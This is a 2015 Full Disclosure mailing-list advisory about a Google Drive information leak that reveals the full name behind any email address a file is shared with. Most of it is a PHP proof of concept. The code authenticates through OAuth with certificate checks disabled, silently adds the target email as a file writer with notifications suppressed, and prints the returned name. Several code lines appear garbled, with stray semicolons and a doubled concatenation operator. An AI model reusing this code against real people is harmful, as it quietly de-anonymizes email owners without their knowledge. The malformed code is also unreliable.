exploit title: full name disclosure information leak in google drive
software link: https://drive.google.com/drive/#my-drive
author: kevin mcsheehan
website: http://mcsheehan.com
email: [email protected]
date: 01/20/15
source: http://mcsheehan.com/?p=15
description: google drive leaks the full name of a target email
address when said email address is associated with an uploaded file.
the full name is displayed whether or not the target has made that
information publicly accessible by creating a google plus account. in
some cases, full name disclosure isn't limited to @gmail/@google and
the full names of @hotmail, @yahoo, etc. users may also be revealed. a
live poc example can be used at the aforementioned source url, or
hosted yourself with the following proof of concept php code which
utilizes
https://github.com/google/google-api-php-client/archive/master.zip and
google drive api:
<?php
//discovered by [email protected] / http://mcsheehan.com
//instructions: using google developers console, generate api
credentials after enabling drive api on a new project and then edit
this file with said credentials (i.e. clientid, clientsecret,
redirecturi) - this also requires google-api-php-client which can be
downloaded here:
https://github.com/google/google-api-php-client/archive/master.zip
$targetEmail = '[email protected]';
require_once "google-api-php-client/src/Google/Client.php";
require_once "google-api-php-client/src/Google/Service/Drive.php";
require_once "google-api-php-client/src/Google/Auth/AssertionCredentials.php";
$cScope = 'https://www.googleapis.com/auth/drive';
$cClientID = '[clientid]';
$cClientSecret = '[clientsecret]';
$cRedirectURI = '[redirecturi]'; //redirect to this file
$cAuthCode = '';
if(isset( $_GET['code'])) {
$cAuthCode = $_GET['code'];
}
if (!($cAuthCode) == "null") {
$rsParams = array(
'scope' => $cScope,
'state' => 'security_token',
'redirect_uri' => $cRedirectURI,
'response_type' => 'code',
'client_id' => $cClientID,
'access_type' => 'offline',
'approval_prompt' => 'force'
);
$cOauthURL = 'https://accounts.google.com/o/oauth2/auth?' .
http_build_query($rsParams);
header('Location: ' . $cOauthURL);
exit();
}
elseif (empty($cRefreshToken)) {
$authURL = "https://www.googleapis.com/oauth2/v3/token?code="; .
$cAuthCode . "&client_id=" . $cClientID . "&client_secret=" .
$cClientSecret . "&redirect_uri=" . $cRedirectURI .
"&grant_type=authorization_code";
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, $authURL);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
$oToken = json_decode($output);
$accessToken = $oToken->access_token;
$refreshToken = $oToken->refresh_token;
}
$createURL = "https://www.googleapis.com/drive/v2/files";;
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
"Authorization: Bearer " . $accessToken
));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, $createURL);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, "{\"title\": \"revealyourself1\"}");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
$oToken = json_decode($output);
$fileID = $oToken->id;
$compileJSON = array("role" => "writer","type" => "user","value"
=> $targetEmail,"emailAddress" => $targetEmail);
$jsonPostData = json_encode($compileJSON);
$addUser = "https://www.googleapis.com/drive/v2/files/"; . $fileID
.. "/permissions?sendNotificationEmails=false";
$ch = curl_init();
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/json',
"Authorization: Bearer " . $accessToken
));
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'POST');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_URL, $addUser);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonPostData);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$output = curl_exec($ch);
curl_close($ch);
if (strpos($output,'error') !== false) {
echo 'error feedback from google:<br><br>' . $output;
} else {
$oToken = json_decode($output);
$fullName = $oToken->name;
echo $targetEmail . ' is ' . $fullName;
}
?>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
